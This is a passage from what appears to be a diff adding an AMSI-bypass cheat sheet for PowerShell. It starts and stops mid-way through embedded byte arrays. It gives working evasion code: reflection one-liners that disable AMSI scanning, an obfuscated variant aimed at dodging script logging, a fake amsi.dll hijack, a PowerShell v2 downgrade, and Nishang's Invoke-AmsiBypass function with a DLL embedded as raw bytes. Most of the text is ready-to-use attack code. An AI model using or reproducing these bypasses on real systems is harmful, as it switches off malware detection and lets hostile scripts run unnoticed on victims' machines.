0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)) | + Out-Null; + Write-Output "DLL has been reflected"; + } + [Bypass.AMSI]::Patch(); +} +MyPatch; +Start-Sleep 1; +``` + +# Using Matt Graebers Reflection method + +```ps1 +[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) +``` +# Using Matt Graebers Reflection method with WMF5 autologging bypass + +```ps1 +[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True) +``` + +## Using Matt Graebers second Reflection method + +```ps1 
+[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141) +``` + +## Using Cornelis de Plaas DLL hijack method + +```ps1 +[Byte[]] $temp = $DllBytes -split ' ' +Write-Output "Executing the bypass." +Write-Verbose "Dropping the fake amsi.dll to disk." +[System.IO.File]::WriteAllBytes("$pwd\amsi.dll", $temp) + +Write-Verbose "Copying powershell.exe to the current working directory." +Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $pwd + +Write-Verbose "Starting powershell.exe from the current working directory." +& "$pwd\powershell.exe" +``` + +## Using PowerShell version 2 + +```ps1 +if ($ShowOnly -eq $True) +{ + Write-Output "If .Net version 2.0.50727 is installed, run powershell -v 2 and run scripts from the new PowerShell process." +} +else +{ + Write-Verbose "Checking if .Net version 2.0.50727 is installed." + $versions = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | Get-ItemProperty -name Version -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select -ExpandProperty Version + if($versions -match "2.0.50727") + { + Write-Verbose ".Net version 2.0.50727 found." + Write-Output "Executing the bypass." + powershell.exe -version 2 + } + else + { + Write-Verbose ".Net version 2.0.50727 not found. Can't start PowerShell v2." + } +} +``` + +## Nishang all in one + +```ps1 +function Invoke-AmsiBypass +{ +<# +.SYNOPSIS +Nishang script which uses publicly known methods to bypass/avoid AMSI. + +.DESCRIPTION +This script implements publicly known methods bypass or avoid AMSI on Windows machines. + +AMSI is a script malware detection mechanism enabled by default in Windows 10. +(https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx) + +This script implements 6 methods of bypassing AMSI. +unload - Method by Matt Graeber. 
Unloads AMSI from current PowerShell session. +unload2 - Another method by Matt Graeber. Unloads AMSI from current PowerShell session. +unloadsilent - Another method by Matt Graeber. Unloads AMSI and avoids WMF5 autologging. +unloadobfuscated - 'unload' method above obfuscated with Daneil Bohannon's Invoke-Obfuscation - which avoids WMF5 autologging. +dllhijack - Method by Cornelis de Plaa. The amsi.dll used in the code is from p0wnedshell (https://github.com/Cn33liz/p0wnedShell) +psv2 - If .net 2.0.50727 is available on Windows 10. PowerShell v2 is launched which doesn't support AMSI. + +The script also provides information on tools which can be used for obfuscation: +ISE-Steroids (http://www.powertheshell.com/isesteroidsmanual/download/) +Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation) + +.PARAMETER Method +The method to be used for elevation. Defaut one is unloadsilent. + +.PARAMETER ShowOnly +The bypass is not executed. Just shown to the user. + +.EXAMPLE +PS > Invoke-AmsiBypass -Verbose +Above command runs the unloadsilent method. + +.EXAMPLE +PS > Invoke-PsUACme -Method unloadobfuscated -Verbose +Above command runs the unloadobfuscated method. 
+ +.LINK +http://www.labofapenetrationtester.com/2016/09/amsi.html +https://github.com/samratashok/nishang +#> + + + [CmdletBinding()] Param( + + [Parameter(Position = 0, Mandatory = $False)] + [ValidateSet("unload","unloadsilent","unloadobfuscated","unload2","dllhijack","psv2","obfuscation")] + [String] + $Method = "unloadsilent", + + [Parameter(Position = 1, Mandatory = $False)] + [Switch] + $ShowOnly + ) + + $AmsiX86 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 190 171 71 149 250 202 41 198 250 202 41 198 250 202 41 198 243 178 186 198 248 202 41 198 148 145 40 199 249 202 41 198 148 145 42 199 251 202 41 198 148 145 44 199 242 202 41 198 148 145 45 199 241 202 41 198 39 53 226 198 248 202 41 198 250 202 40 198 231 202 41 198 40 145 33 199 251 202 41 198 40 145 214 198 251 202 41 198 40 145 43 199 251 202 41 198 82 105 99 104 250 202 41 198 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 6 0 144 29 62 87 0 0 0 0 0 0 0 0 224 0 2 33 11 1 14 0 0 14 0 0 0 18 0 0 0 0 0 0 43 19 0 0 0 16 0 0 0 32 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 112 0 0 0 4 0 0 0 0 0 0 2 0 64 1 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 148 36 0 0 80 0 0 0 0 80 0 0 224 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 96 0 0 44 1 0 0 176 32 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 33 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 124 12 0 0 0 16 0 0 0 14 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 220 7 0 0 0 32 0 0 0 8 0 0 0 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 100 97 116 97 0 0 0 136 3 0 0 0 48 0 0 0 2 0 0 0 26 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 64 0 0 192 46 103 102 105 100 115 0 0 20 0 0 0 0 64 0 0 0 2 0 0 0 28 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 1 0 0 0 80 0 0 0 2 0 0 0 30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 44 1 0 0 0 96 0 0 0 2 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 51 192 194 12 0 59 13 4 48 0 16 242 117 2 242 195 242 233 96 3 0 0 85 139 236 139 69 12 131 232 0 116 51 131 232 1 116 32 131 232 1 116 17 131 232 1 116 5 51 192 64 235 48 232 245 4 0 0 235 5 232 207 4 0 0 15 182 192 235 31 255 117 16 255 117 8 232 24 0 0 0 89 235 16 131 125 16 0 15 149 192 15 182 192 80 232 23 1 0 0 89 93 194 12 0 106 16 104 24 36 0 16 232 123 9 0 0 106 0 232 35 5 0 0 89 132 192 117 7 51 192 233 224 0 0 0 232 40 4 0 0 136 69 227 179 1 136 93 231 131 101 252 0 131 61 60 51 0 16 0 116 7 106 7 232 203 7 0 0 199 5 60 51 0 16 1 0 0 0 232 74 4 0 0 132 192 116 101 232 206 8 0 0 104 186 25 0 16 232 177 6 0 0 232 93 7 0 0 199 4 36 57 24 0 16 232 160 6 0 0 232 112 7 0 0 199 4 36 128 32 0 16 104 124 32 0 16 232 78 11 0 0 89 89 133 192 117 41 232 237 3 0 0 132 192 116 32 104 120 32 0 16 104 116 32 0 16 232 42 11 0 0 89 89 199 5 60 51 0 16 2 0 0 0 50 219 136 93 231 199 69 252 254 255 255 255 232 68 0 0 0 132 219 15 133 76 255 255 255 232 52 7 0 0 139 240 131 62 0 116 30 86 232 40 5 0 0 89 132 192 116 19 255 117 12 106 2 255 117 8 139 54 139 206 232 136 8 0 0 255 214 255 5 24 48 0 16 51 192 
64 232 201 8 0 0 195 138 93 231 255 117 227 232 131 5 0 0 89 195 106 12 104 56 36 0 16 232 105 8 0 0 161 24 48 0 16 133 192 127 4 51 192 235 79 72 163 24 48 0 16 232 22 3 0 0 136 69 228 131 101 252 0 131 61 60 51 0 16 2 116 7 106 7 232 190 6 0 0 232 180 3 0 0 131 37 60 51 0 16 0 199 69 252 254 255 255 255 232 27 0 0 0 106 0 255 117 8 232 65 5 0 0 89 89 51 201 132 192 15 149 193 139 193 232 78 8 0 0 195 232 164 3 0 0 255 117 228 232 6 5 0 0 89 195 106 12 104 88 36 0 16 232 236 7 0 0 131 101 252 0 139 125 12 131 255 1 116 10 131 255 2 116 5 139 93 8 235 49 255 117 16 87 139 93 8 83 232 218 0 0 0 139 240 137 117 228 133 246 15 132 190 0 0 0 255 117 16 87 83 232 216 253 255 255 139 240 137 117 228 133 246 15 132 167 0 0 0 131 255 1 117 7 83 232 198 9 0 0 89 255 117 16 87 83 232 159 253 255 255 139 240 137 117 228 131 255 1 117 43 133 246 117 30 255 117 16 80 83 232 135 253 255 255 255 117 16 86 83 232 147 253 255 255 255 117 16 86 83 232 116 0 0 0 131 255 1 117 4 133 246 116 4 133 255 117 11 83 232 130 9 0 0 89 133 255 116 5 131 255 3 117 72 255 117 16 87 83 232 98 253 255 255 139 240 137 117 228 133 246 116 53 255 117 16 87 83 232 58 0 0 0 139 240 235 36 139 77 236 139 1 81 255 48 104 22 16 0 16 255 117 16 255 117 12 255 117 8 232 86 2 0 0 131 196 24 195 139 101 232 51 246 137 117 228 199 69 252 254 255 255 255 139 198 232 54 7 0 0 195 85 139 236 86 139 53 160 32 0 16 133 246 117 5 51 192 64 235 18 255 117 16 139 206 255 117 12 255 117 8 232 193 6 0 0 255 214 94 93 194 12 0 85 139 236 131 125 12 1 117 5 232 88 4 0 0 255 117 16 255 117 12 255 117 8 232 177 254 255 255 131 196 12 93 194 12 0 85 139 236 106 0 255 21 40 32 0 16 255 117 8 255 21 0 32 0 16 104 9 4 0 192 255 21 4 32 0 16 80 255 21 8 32 0 16 93 195 85 139 236 129 236 36 3 0 0 106 23 232 234 8 0 0 133 192 116 5 106 2 89 205 41 163 32 49 0 16 137 13 28 49 0 16 137 21 24 49 0 16 137 29 20 49 0 16 137 53 16 49 0 16 137 61 12 49 0 16 102 140 21 56 49 0 16 102 140 13 44 49 0 16 102 140 29 8 49 0 16 102 140 5 4 49 0 
16 102 140 37 0 49 0 16 102 140 45 252 48 0 16 156 143 5 48 49 0 16 139 69 0 163 36 49 0 16 139 69 4 163 40 49 0 16 141 69 8 163 52 49 0 16 139 133 220 252 255 255 199 5 112 48 0 16 1 0 1 0 161 40 49 0 16 163 44 48 0 16 199 5 32 48 0 16 9 4 0 192 199 5 36 48 0 16 1 0 0 0 199 5 48 48 0 16 1 0 0 0 106 4 88 107 192 0 199 128 52 48 0 16 2 0 0 0 106 4 88 107 192 0 139 13 4 48 0 16 137 76 5 248 106 4 88 193 224 0 139 13 0 48 0 16 137 76 5 248 104 164 32 0 16 232 225 254 255 255 139 229 93 195 85 139 236 139 69 8 86 139 72 60 3 200 15 183 65 20 141 81 24 3 208 15 183 65 6 107 240 40 3 242 59 214 116 25 139 77 12 59 74 12 114 10 139 66 8 3 66 12 59 200 114 12 131 194 40 59 214 117 234 51 192 94 93 195 139 194 235 249 232 85 7 0 0 133 192 117 3 50 192 195 100 161 24 0 0 0 86 190 64 51 0 16 139 80 4 235 4 59 208 116 16 51 192 139 202 240 15 177 14 133 192 117 240 50 192 94 195 176 1 94 195 232 32 7 0 0 133 192 116 7 232 118 5 0 0 235 5 232 77 7 0 0 176 1 195 106 0 232 207 0 0 0 132 192 89 15 149 192 195 232 97 7 0 0 132 192 117 3 50 192 195 232 85 7 0 0 132 192 117 7 232 76 7 0 0 235 237 176 1 195 232 66 7 0 0 232 61 7 0 0 176 1 195 85 139 236 232 203 6 0 0 133 192 117 24 131 125 12 1 117 18 255 117 16 139 77 20 80 255 117 8 232 136 4 0 0 255 85 20 255 117 28 255 117 24 232 219 6 0 0 89 89 93 195 232 155 6 0 0 133 192 116 12 104 68 51 0 16 232 220 6 0 0 89 195 232 240 6 0 0 133 192 15 132 217 6 0 0 195 106 0 232 221 6 0 0 89 233 215 6 0 0 85 139 236 131 125 8 0 117 7 198 5 92 51 0 16 1 232 186 4 0 0 232 189 6 0 0 132 192 117 4 50 192 93 195 232 176 6 0 0 132 192 117 10 106 0 232 165 6 0 0 89 235 233 176 1 93 195 85 139 236 131 236 12 86 139 117 8 133 246 116 5 131 254 1 117 124 232 31 6 0 0 133 192 116 42 133 246 117 38 104 68 51 0 16 232 80 6 0 0 89 133 192 116 4 50 192 235 87 104 80 51 0 16 232 61 6 0 0 247 216 89 26 192 254 192 235 68 161 4 48 0 16 141 117 244 87 131 224 31 191 68 51 0 16 106 32 89 43 200 131 200 255 211 200 51 5 4 48 0 16 137 69 244 137 69 248 137 69 252 
165 165 165 191 80 51 0 16 137 69 244 137 69 248 141 117 244 137 69 252 176 1 165 165 165 95 94 139 229 93 195 106 5 232 6 2 0 0 204 106 8 104 120 36 0 16 232 117 3 0 0 131 101 252 0 184 77 90 0 0 102 57 5 0 0 0 16 117 96 161 60 0 0 16 129 184 0 0 0 16 80 69 0 0 117 79 185 11 1 0 0 102 57 136 24 0 0 16 117 65 139 69 8 185 0 0 0 16 43 193 80 81 232 180 253 255 255 89 89 133 192 116 42 247 64 36 0 0 0 128 117 33 199 69 252 254 255 255 255 176 1 235 31 139 69 236 139 0 51 201 129 56 5 0 0 192 15 148 193 139 193 195 139 101 232 199 69 252 254 255 255 255 50 192 232 59 3 0 0 195 85 139 236 232 11 5 0 0 133 192 116 15 128 125 8 0 117 9 51 192 185 64 51 0 16 135 1 93 195 85 139 236 128 61 92 51 0 16 0 116 6 128 125 12 0 117 18 255 117 8 232 67 5 0 0 255 117 8 232 59 5 0 0 89 89 176 1 93 195 85 139 236 161 4 48 0 16 139 200 51 5 68 51 0 16 131 225 31 255 117 8 211 200 131 248 255 117 7 232 1 5 0 0 235 11 104 68 51 0 16 232 233 4 0 0 89 247 216 89 27 192 247 208 35 69 8 93 195 85 139 236 255 117 8 232 186 255 255 255 247 216 89 27 192 247 216 72 93 195 85 139 236 131 236 20 131 101 244 0 131 101 248 0 161 4 48 0 16 86 87 191 78 230 64 187 190 0 0 255 255 59 199 116 13 133 198 116 9 247 208 163 0 48 0 16 235 102 141 69 244 80 255 21 28 32 0 16 139 69 248 51 69 244 137 69 252 255 21 32 32 0 16 49 69 252 255 21 36 32 0 16 49 69 252 141 69 236 80 255 21 16 32 0 16 139 77 240 141 69 252 51 77 236 51 77 252 51 200 59 207 117 7 185 79 230 64 187 235 16 133 206 117 12 139 193 13 17 71 0 0 193 224 16 11 200 137 13 4 48 0 16 247 209 137 13 0 48 0 16 95 94 139 229 93 195 104 96 51 0 16 255 21 24 32 0 16 195 104 96 51 0 16 232 229 3 0 0 89 195 184 104 51 0 16 195 184 112 51 0 16 195 232 239 255 255 255 139 72 4 131 8 4 137 72 4 232 231 255 255 255 139 72 4 131 8 2 137 72 4 195 184 132 51 0 16 195 85 139 236 129 236 36 3 0 0 83 86 106 23 232 234 3 0 0 133 192 116 5 139 77 8 205 41 51 246 141 133 220 252 255 255 104 204 2 0 0 86 80 137 53 120 51 0 16 232 133 3 0 0 131 196 12 137 133 140 
253 255 255 137 141 136 253 255 255 137 149 132 253 255 255 137 157 128 253 255 255 137 181 124 253 255 255 137 189 120 253 255 255 102 140 149 164 253 255 255 102 140 141 152 253 255 255 102 140 157 116 253 255 255 102 140 133 112 253 255 255 102 140 165 108 253 255 255 102 140 173 104 253 255 255 156 143 133 156 253 255 255 139 69 4 137 133 148 253 255 255 141 69 4 137 133 160 253 255 255 199 133 220 252 255 255 1 0 1 0 139 64 252 106 80 137 133 144 253 255 255 141 69 168 86 80 232 252 2 0 0 139 69 4 131 196 12 199 69 168 21 0 0 64 199 69 172 1 0 0 0 137 69 180 255 21 20 32 0 16 86 141 88 255 247 219 141 69 168 137 69 248 141 133 220 252 255 255 26 219 137 69 252 254 195 255 21 40 32 0 16 141 69 248 80 255 21 0 32 0 16 133 192 117 13 15 182 195 247 216 27 192 33 5 120 51 0 16 94 91 139 229 93 195 83 86 190 8 36 0 16 187 8 36 0 16 59 243 115 24 87 139 62 133 255 116 9 139 207 232 56 0 0 0 255 215 131 198 4 59 243 114 234 95 94 91 195 83 86 190 16 36 0 16 187 16 36 0 16 59 243 115 24 87 139 62 133 255 116 9 139 207 232 13 0 0 0 255 215 131 198 4 59 243 114 234 95 94 91 195 255 37 112 32 0 16 204 204 204 204 204 104 75 26 0 16 100 255 53 0 0 0 0 139 68 36 16 137 108 36 16 141 108 36 16 43 224 83 86 87 161 4 48 0 16 49 69 252 51 197 80 137 101 232 255 117 248 139 69 252 199 69 252 254 255 255 255 137 69 248 141 69 240 100 163 0 0 0 0 242 195 139 77 240 100 137 13 0 0 0 0 89 95 95 94 91 139 229 93 81 242 195 85 139 236 255 117 20 255 117 16 255 117 12 255 117 8 104 5 16 0 16 104 4 48 0 16 232 203 1 0 0 131 196 24 93 195 85 139 236 131 37 124 51 0 16 0 131 236 44 83 51 219 67 9 29 16 48 0 16 106 10 232 228 1 0 0 133 192 15 132 116 1 0 0 131 101 236 0 51 192 131 13 16 48 0 16 2 51 201 86 87 137 29 124 51 0 16 141 125 212 83 15 162 139 243 91 137 7 137 119 4 137 79 8 137 87 12 139 69 212 139 77 224 137 69 244 129 241 105 110 101 73 139 69 220 53 110 116 101 108 11 200 139 69 216 53 71 101 110 117 11 200 247 217 106 1 88 26 201 106 0 128 193 1 89 83 15 162 139 243 91 137 
7 137 119 4 137 79 8 137 87 12 116 67 139 69 212 37 240 63 255 15 61 192 6 1 0 116 35 61 96 6 2 0 116 28 61 112 6 2 0 116 21 61 80 6 3 0 116 14 61 96 6 3 0 116 7 61 112 6 3 0 117 17 139 61 128 51 0 16 131 207 1 137 61 128 51 0 16 235 6 139 61 128 51 0 16 131 125 244 7 139 69 224 137 69 228 139 69 220 137 69 248 137 69 232 124 50 106 7 88 51 201 83 15 162 139 243 91 141 93 212 137 3 137 115 4 137 75 8 137 83 12 139 69 216 169 0 2 0 0 137 69 236 139 69 248 116 9 131 207 2 137 61 128 51 0 16 95 94 169 0 0 16 0 116 109 131 13 16 48 0 16 4 199 5 124 51 0 16 2 0 0 0 169 0 0 0 8 116 85 169 0 0 0 16 116 78 51 201 15 1 208 137 69 240 137 85 244 139 69 240 139 77 244 131 224 6 51 201 131 248 6 117 51 133 201 117 47 161 16 48 0 16 131 200 8 199 5 124 51 0 16 3 0 0 0 246 69 236 32 163 16 48 0 16 116 18 131 200 32 199 5 124 51 0 16 5 0 0 0 163 16 48 0 16 51 192 91 139 229 93 195 51 192 57 5 20 48 0 16 15 149 192 195 195 255 37 52 32 0 16 255 37 60 32 0 16 255 37 56 32 0 16 255 37 48 32 0 16 255 37 64 32 0 16 255 37 104 32 0 16 255 37 100 32 0 16 255 37 96 32 0 16 255 37 92 32 0 16 255 37 88 32 0 16 255 37 84 32 0 16 255 37 80 32 0 16 255 37 76 32 0 16 255 37 72 32 0 16 255 37 12 32 0 16 176 1 195 51 192 195 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 38 0 
0 0 39 0 0 20 39 0 0 40 39 0 0 68 39 0 0 186 39 0 0 164 39 0 0 138 39 0 0 116 39 0 0 94 39 0 0 226 38 0 0 0 0 0 0 184 37 0 0 84 37 0 0 152 37 0 0 118 37 0 0 194 37 0 0 0 0 0 0 154 38 0 0 140 38 0 0 116 38 0 0 88 38 0 0 60 38 0 0 26 38 0 0 8 38 0 0 250 37 0 0 238 37 0 0 0 0 0 0 27 28 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 48 0 16 112 48 0 16 0 0 0 0 0 0 0 0 144 29 62 87 0 0 0 0 2 0 0 0 61 0 0 0 132 33 0 0 132 19 0 0 0 0 0 0 144 29 62 87 0 0 0 0 12 0 0 0 20 0 0 0 196 33 0 0 196 19 0 0 0 0 0 0 144 29 62 87 0 0 0 0 13 0 0 0 44 2 0 0 216 33 0 0 216 19 0 0 0 0 0 0 144 29 62 87 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 92 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 48 0 16 128 33 0 16 1 0 0 0 112 32 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 75 26 0 0 82 83 68 83 69 10 117 219 0 114 41 77 133 149 98 78 29 103 122 248 7 0 0 0 67 58 92 68 101 118 101 108 111 112 109 101 110 116 92 65 109 115 105 92 82 101 108 101 97 115 101 92 65 109 115 105 46 112 100 98 0 0 0 0 0 0 0 0 20 0 0 0 20 0 0 0 1 0 0 0 19 0 0 0 71 67 84 76 0 16 0 0 124 12 0 0 46 116 101 120 116 36 109 110 0 0 0 0 0 32 0 0 112 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 112 32 0 0 4 0 0 0 46 48 48 99 102 103 0 0 116 32 0 0 4 0 0 0 46 67 82 84 36 88 67 65 0 0 0 0 120 32 0 0 4 0 0 0 46 67 82 84 36 88 67 90 0 0 0 0 124 32 0 0 4 0 0 0 46 67 82 84 36 88 73 65 0 0 0 0 128 32 0 0 4 0 0 0 46 67 82 84 36 88 73 90 0 0 0 0 132 32 0 0 4 0 0 0 46 67 82 84 36 88 80 65 0 0 0 0 136 32 0 0 4 0 0 0 46 67 82 84 36 88 80 90 0 0 0 0 140 32 0 0 4 0 0 0 46 67 82 84 36 88 84 65 0 0 0 0 144 32 0 0 4 0 0 0 46 67 82 84 36 88 84 90 0 0 0 0 160 32 0 0 220 0 0 0 46 114 100 97 116 97 0 0 128 33 0 0 4 0 0 0 46 114 100 97 116 97 36 115 120 100 97 116 97 0 0 0 132 33 0 0 128 2 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 4 36 0 0 4 0 0 0 46 114 116 99 36 73 65 65 0 0 0 0 8 36 0 0 4 0 0 0 46 114 116 
99 36 73 90 90 0 0 0 0 12 36 0 0 4 0 0 0 46 114 116 99 36 84 65 65 0 0 0 0 16 36 0 0 4 0 0 0 46 114 116 99 36 84 90 90 0 0 0 0 24 36 0 0 124 0 0 0 46 120 100 97 116 97 36 120 0 0 0 0 148 36 0 0 60 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 208 36 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 228 36 0 0 112 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 84 37 0 0 136 2 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 24 0 0 0 46 100 97 116 97 0 0 0 24 48 0 0 112 3 0 0 46 98 115 115 0 0 0 0 0 64 0 0 20 0 0 0 46 103 102 105 100 115 36 121 0 0 0 0 0 80 0 0 88 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 96 80 0 0 128 1 0 0 46 114 115 114 99 36 48 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 254 255 255 255 0 0 0 0 208 255 255 255 0 0 0 0 254 255 255 255 0 0 0 0 110 17 0 16 0 0 0 0 254 255 255 255 0 0 0 0 212 255 255 255 0 0 0 0 254 255 255 255 0 0 0 0 233 17 0 16 0 0 0 0 254 255 255 255 0 0 0 0 212 255 255 255 0 0 0 0 254 255 255 255 203 18 0 16 234 18 0 16 0 0 0 0 254 255 255 255 0 0 0 0 216 255 255 255 0 0 0 0 254 255 255 255 215 22 0 16 234 22 0 16 20 37 0 0 0 0 0 0 0 0 0 0 220 37 0 0 48 32 0 0 44 37 0 0 0 0 0 0 0 0 0 0 164 38 0 0 72 32 0 0 228 36 0 0 0 0 0 0 0 0 0 0 206 39 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 38 0 0 0 39 0 0 20 39 0 0 40 39 0 0 68 39 0 0 186 39 0 0 164 39 0 0 138 39 0 0 116 39 0 0 94 39 0 0 